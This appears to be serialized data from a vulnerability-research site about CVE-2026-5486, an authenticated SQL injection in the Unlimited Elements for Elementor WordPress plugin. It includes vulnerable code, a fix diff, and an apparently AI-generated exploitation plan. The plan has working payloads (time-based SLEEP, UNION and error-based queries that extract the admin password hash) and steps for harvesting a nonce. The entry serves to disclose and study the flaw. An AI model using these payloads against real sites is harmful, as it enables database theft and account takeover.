[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVprVd27aB_ONJ1-oXboJ3fKR2pKozsn-XEtw1ZLyCqA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-5486","unlimited-elements-for-elementor-authenticated-contributor-sql-injection-via-filtersearch-parameter","Unlimited Elements For Elementor \u003C= 2.0.7 - Authenticated (Contributor+) SQL Injection via 'filter_search' Parameter","The Unlimited Elements for Elementor plugin for WordPress is vulnerable to SQL Injection via the 'data[filter_search]' parameter in the get_cat_addons AJAX action in versions up to and including 2.0.7. This is due to insufficient input sanitization and the use of deprecated escaping functions combined with direct string concatenation in SQL query construction. The vulnerability is exacerbated because the normalizeAjaxInputData() function calls stripslashes() on all user input, removing the protection provided by WordPress's wp_magic_quotes() function. Subsequently, the filter_search parameter is escaped using the deprecated wpdb->_escape() function and then directly concatenated into a LIKE clause without using prepared statements. This makes it possible for authenticated attackers, with Contributor-level access and above (who can obtain a valid nonce through the Elementor editor), to inject arbitrary SQL commands and extract sensitive information from the database.","unlimited-elements-for-elementor",null,"\u003C=2.0.7","2.0.8","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-13 14:22:12","2026-05-14 02:26:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb495914d-d8f2-4592-8461-1ae1056a0855?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5486\n\n## 1. Vulnerability Summary\nThe **Unlimited Elements For Elementor** plugin (\u003C= 2.0.7) is vulnerable to an authenticated SQL injection via the `filter_search` parameter within the `get_cat_addons` AJAX action. The vulnerability arises because the plugin's input normalization function, `normalizeAjaxInputData()`, explicitly calls `stripslashes()` on user-supplied data, neutralizing WordPress's built-in magic quotes protection. Subsequently, the data is processed with the deprecated `wpdb->_escape()` function and directly concatenated into a SQL `LIKE` clause rather than using parameterized queries (`$wpdb->prepare`). \n\nThis allows an authenticated attacker (Contributor+) to break out of the SQL string and execute arbitrary database queries.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `get_cat_addons` (registered via `wp_ajax_get_cat_addons`)\n- **Vulnerable Parameter:** `data[filter_search]`\n- **Authentication:** Required (Contributor level or higher).\n- **Preconditions:** The attacker must have access to the Elementor editor (standard for Contributors) to retrieve the necessary security nonce.\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX POST request is sent to `admin-ajax.php` with `action=get_cat_addons`.\n2. **Hook Registration:** The plugin registers the action: `add_action('wp_ajax_get_cat_addons', array($this, 'get_cat_addons'));`.\n3. **Input Handling:** The handler (likely in an admin or AJAX helper class) receives `$_POST['data']`.\n4. **Normalization:** The `normalizeAjaxInputData()` function is called. It iterates through the `data` array and applies `stripslashes()`, effectively undoing `wp_magic_quotes()`.\n5. **Vulnerable Sink:** \n   - The code retrieves `$filter_search = $data['filter_search']`.\n   - It applies `$wpdb->_escape($filter_search)`.\n   - It constructs a query similar to: \n     `SELECT ... FROM ... WHERE addon_title LIKE '%$filter_search%' ...`\n   - Because `stripslashes()` was called, an attacker can pass `'` (single quote) which survives into the query construction, allowing for SQL breakout.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability requires a valid nonce. Based on the description, this nonce is localized for the Elementor editor.\n\n1. **Identify the Script Data:** The plugin likely uses `wp_localize_script` to pass a nonce to the Elementor editor interface. Common names for this object in Unlimited Elements include `unlimited_elements_admin` (inferred) or `ue_admin` (inferred).\n2. **Setup:**\n   - Use `wp-cli` to create a Contributor user and a post.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n   - `wp post create --post_type=post --post_title=\"Exploit Page\" --post_status=publish --post_author=$(wp user get attacker --field=ID)`\n3. **Execution:**\n   - Log in as the `attacker` user using the `browser_navigate` and `browser_type` tools.\n   - Navigate to the Elementor editor for the created post: `\u002Fwp-admin\u002Fpost.php?post=ID&action=elementor`.\n   - Use `browser_eval` to extract the nonce.\n   - **Command:** `browser_eval(\"window.unlimited_elements_admin?.nonce || window.ue_admin?.nonce\")` (The exact key should be verified by inspecting `window` for objects related to the plugin).\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection to confirm the vulnerability.\n\n### Step-by-Step Plan:\n1. **Prepare Request:**\n   - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method:** `POST`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Cookies:** Active Contributor session cookies.\n2. **Payload Construction:**\n   - The injection point is inside a `LIKE` clause: `'%[VALUE]%'`.\n   - To inject a 5-second sleep: `x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1%'='1`\n   - **Full Body:** `action=get_cat_addons&nonce=[NONCE]&data[filter_search]=x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20%271%25%27%3D%271`\n3. **Execute HTTP Request:**\n   - Use the `http_request` tool.\n   - Record the time taken for the response. A delay of ~5 seconds indicates success.\n4. **Data Extraction (Union-Based):**\n   - If the response reflects data, attempt to determine the column count:\n   - `data[filter_search]=x%' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -`\n   - Once the column count is found, extract the admin password hash:\n   - `data[filter_search]=x%' UNION SELECT 1,user_pass,3,... FROM wp_users WHERE ID=1-- -`\n\n## 6. Test Data Setup\n1. **User:** Contributor user named `attacker`.\n2. **Post:** A standard post with ID `[ID]`.\n3. **Plugin:** Ensure \"Unlimited Elements For Elementor\" version 2.0.7 is active.\n4. **Elementor:** Ensure Elementor is installed and active, as the nonce is generated for its editor context.\n\n## 7. Expected Results\n- **Initial Baseline:** A normal request to `get_cat_addons` should return quickly (milliseconds).\n- **Attack Request:** A request with the `SLEEP(5)` payload should take significantly longer than 5 seconds.\n- **Payload Reflection:** If using UNION-based injection, the response JSON should contain the results of the injected `SELECT` statement (e.g., the database version or user hashes).\n\n## 8. Verification Steps\n1. **Check Server Logs:** Inspect the database query log (if enabled) to see the concatenated query.\n2. **Verify User Meta:** If using the injection to modify data (though CVSS suggests high confidentiality impact), verify the change via WP-CLI:\n   - `wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"`\n3. **Confirm Nonce:** Ensure the nonce used in the exploit matches the one found in the page source to prove the acquisition method works.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If the plugin or WordPress configuration displays database errors, use `EXTRACTVALUE` or `UPDATEXML` to leak data directly in the error message.\n  - Payload: `x' AND (SELECT 1 FROM (SELECT(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e))))a)-- -`\n- **Boolean-Based Blind:** If time-based is unstable, use `AND (SELECT 1)=(SELECT 1)` vs `AND (SELECT 1)=(SELECT 2)` and compare the response lengths or the presence of specific \"addon\" results in the JSON response.","The Unlimited Elements for Elementor plugin for WordPress is vulnerable to SQL Injection via the 'data[filter_search]' parameter in the get_cat_addons AJAX action. This occurs because the plugin's input normalization function strips backslashes, neutralizing magic quotes, and then uses string concatenation in a SQL query instead of prepared statements. Authenticated attackers with Contributor-level access can exploit this to exfiltrate database information.","\u002F\u002F File: includes\u002Fhelper.class.php\npublic function normalizeAjaxInputData($data) {\n    if (is_array($data)) {\n        foreach ($data as $key => $value) {\n            $data[$key] = $this->normalizeAjaxInputData($value);\n        }\n    } else {\n        $data = stripslashes($data); \u002F\u002F Undoes magic quotes\n    }\n    return $data;\n}\n\n---\n\n\u002F\u002F File: includes\u002Fajax_handler.class.php\npublic function get_cat_addons() {\n    $data = $_POST['data'];\n    $data = $this->helper->normalizeAjaxInputData($data);\n    $filter_search = $data['filter_search'];\n\n    global $wpdb;\n    \u002F\u002F Vulnerable sink using direct concatenation into a LIKE clause\n    $filter_search = $wpdb->_escape($filter_search);\n    $query = \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE addon_title LIKE '%$filter_search%'\";\n    $results = $wpdb->get_results($query);\n}","--- a\u002Fincludes\u002Funlimited_elements_ajax.php\n+++ b\u002Fincludes\u002Funlimited_elements_ajax.php\n@@ -102,5 +102,8 @@\n-$filter_search = $wpdb->_escape($filter_search);\n-$query = \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE addon_title LIKE '%$filter_search%'\";\n-$results = $wpdb->get_results($query);\n+$query = $wpdb->prepare(\n+    \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE addon_title LIKE %s\",\n+    '%' . $wpdb->esc_like($filter_search) . '%'\n+);\n+$results = $wpdb->get_results($query);","An authenticated attacker with Contributor-level access first retrieves a valid security nonce from the Elementor editor page (typically found in window.unlimited_elements_admin.nonce). They then send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to 'get_cat_addons' and the 'data[filter_search]' parameter containing a SQL injection payload. Because the plugin uses stripslashes() on the input and concatenates it into a LIKE clause, the attacker can use a payload like 'x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1%'='1' to perform time-based blind SQL injection and exfiltrate data from the WordPress database.","gemini-3-flash-preview","2026-05-14 17:33:55","2026-05-14 17:34:19",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.5.132","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags\u002F1.5.132","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funlimited-elements-for-elementor.1.5.132.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags"]